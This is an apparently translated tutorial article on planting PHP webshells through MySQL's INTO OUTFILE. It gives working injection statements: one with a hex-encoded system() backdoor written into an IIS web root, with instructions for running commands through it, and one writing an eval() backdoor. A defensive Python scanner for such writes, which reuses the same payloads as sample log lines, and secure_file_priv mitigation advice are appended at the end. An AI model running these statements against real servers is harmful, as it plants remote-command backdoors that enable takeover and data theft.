A MySQL statement that generates a backdoor Trojan

  • 2020-10-23 20:19:13
  • OfStack

Ahem, just look at it; I am not responsible for the consequences.


SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

By injecting it into MySQL, or by running the statement above in phpMyAdmin, the file cmd.php is generated under C:/inetpub/wwwroot/. It contains the original vbb_strikes rows followed by: 2 3 <?php system($_REQUEST[cmd]);?>

Then, through http://www.xxx.com/cmd.php?cmd=dir c:, you can execute system DOS commands!

What is the string 0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E?

It is <?php system($_REQUEST[cmd]);?> written as a hexadecimal literal. If you do not use this hex form, different MySQL versions will write other codes instead (such as %xx), and the backdoor will not work. To convert a different string, open it in UltraEdit and press [Ctrl+H] to switch to the hexadecimal view.

Discussion of the MySQL "export a one-line Trojan" method for getting a WebShell: only one statement is needed

Yesterday I read an article about MySQL's method of exporting a one-line Trojan to get a WebShell.
The SQL statements used in that article are as follows (run from the command line or from any other shell that can execute SQL commands):
DROP TABLE IF EXISTS temp; -- if temp exists, delete it
CREATE TABLE temp(cmd text NOT NULL); -- create the temp table, which has only one field, cmd
INSERT INTO temp (cmd) VALUES(''); -- insert the one-line Trojan into the temp table
SELECT cmd FROM temp INTO OUTFILE 'F:/wwwroot/eval.php'; -- query the one-liner from temp and export the result to eval.php
DROP TABLE IF EXISTS temp; -- delete temp (clean up after ourselves o(∩_∩)o...)
These SQL statements are very simple; I have added brief comments to them.
However, consider the statement we often use when testing a PHP application for SQL injection:
/**/UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12/*
One of the numbers 1 to 12 will appear on the returned page; suppose here that 3 is the one displayed.
If we change the statement to /**/UNION SELECT 1,2,'zerosoul',4,5,6,7,8,9,10,11,12/*, the returned page shows zerosoul where 3 was displayed before.
In other words, when a SELECT has no FROM clause, the numbers or strings in its select list are returned directly as the query result.
So why bother creating a table, inserting the data and then exporting it?
With this in mind, the SQL above can be reduced directly to one statement:

Select '<?php eval($_POST[cmd]);?>' into outfile 'F:/wwwroot/eval.php';

Not only is this simpler and more direct, it also avoids accidentally deleting someone else's data. That is the end of this article; I hope you found it useful.
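As an added defensive example (not part of either article above): a small Python scanner that reads MySQL general-log lines and flags INTO OUTFILE / INTO DUMPFILE statements that look like the webshell drops both articles describe (a target under a web root or with a script extension, or a plain or 0x-hex literal containing a PHP open tag), plus a check of the secure_file_priv setting that stops such writes. The log lines, web-root markers and file extensions are constructed assumptions, not taken from any real server.

```python
import re
SAMPLE_LOG = "\n".join([  # constructed general-log lines, made up for this example
    "2020-10-23T12:19:13Z   12 Query  SELECT id, name FROM vbb_strikes WHERE id = 7",
    "2020-10-23T12:19:14Z   12 Query  SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,"
    "0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'",
    "2020-10-23T12:19:15Z   13 Query  Select '<?php eval($_POST[cmd]);?>' into outfile 'F:/wwwroot/eval.php'",
    "2020-10-23T12:19:16Z   14 Query  SELECT name FROM users INTO OUTFILE '/var/lib/mysql-files/users.csv'",
])
LOG_LINE_RE = re.compile(r"^(\S+)\s+(\d+)\s+Query\s+(.*)$")  # "<time> <thread id> Query <sql>"
OUTFILE_RE = re.compile(r"\binto\s+(?:outfile|dumpfile)\s+'([^']*)'", re.IGNORECASE)
HEX_RE = re.compile(r"\b0x([0-9a-fA-F]{2,})\b")
WEBROOT_MARKERS = ("wwwroot", "htdocs", "/var/www", "public_html")  # assumed typical web roots
SCRIPT_EXT = (".php", ".phtml", ".jsp", ".asp", ".aspx")

def decode_hex_literals(sql):
    """Decode well-formed 0x... literals so a payload hidden as hex can still be inspected."""
    return [bytes.fromhex(h).decode("latin-1") for h in HEX_RE.findall(sql) if len(h) % 2 == 0]

def assess_query(sql):
    """None if the statement writes no file; else a finding listing why it looks like a webshell drop."""
    m = OUTFILE_RE.search(sql)
    if not m:
        return None
    path = m.group(1).replace("\\", "/").lower()
    reasons = []
    if path.endswith(SCRIPT_EXT):
        reasons.append("target has a server-side script extension")
    if any(marker in path for marker in WEBROOT_MARKERS):
        reasons.append("target path is under a likely web root")
    if any("<?" in text for text in [sql] + decode_hex_literals(sql)):
        reasons.append("a literal (plain or 0x hex) contains a PHP open tag")
    return {"path": m.group(1), "reasons": reasons, "severity": "high" if reasons else "low"}

def scan_general_log(text):
    """One finding per INTO OUTFILE / INTO DUMPFILE statement found in general-log text."""
    findings = []
    for lm in filter(None, map(LOG_LINE_RE.match, text.splitlines())):
        finding = assess_query(lm.group(3))
        if finding:
            findings.append(dict(finding, time=lm.group(1), thread=int(lm.group(2))))
    return findings

def outfile_writes_blocked(secure_file_priv, target_path):
    """Mitigation check: NULL blocks all file writes, '' allows any path, a directory allows only paths under it."""
    if secure_file_priv is None or secure_file_priv.upper() == "NULL":
        return True
    if secure_file_priv == "":
        return False
    base = secure_file_priv.replace("\\", "/").rstrip("/").lower() + "/"
    return not target_path.replace("\\", "/").lower().startswith(base)
```

Setting secure_file_priv to NULL (or to a directory outside the web root) and withholding the FILE privilege from application accounts removes this write path entirely, so the scanner is a backstop for servers where that has not yet been done.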

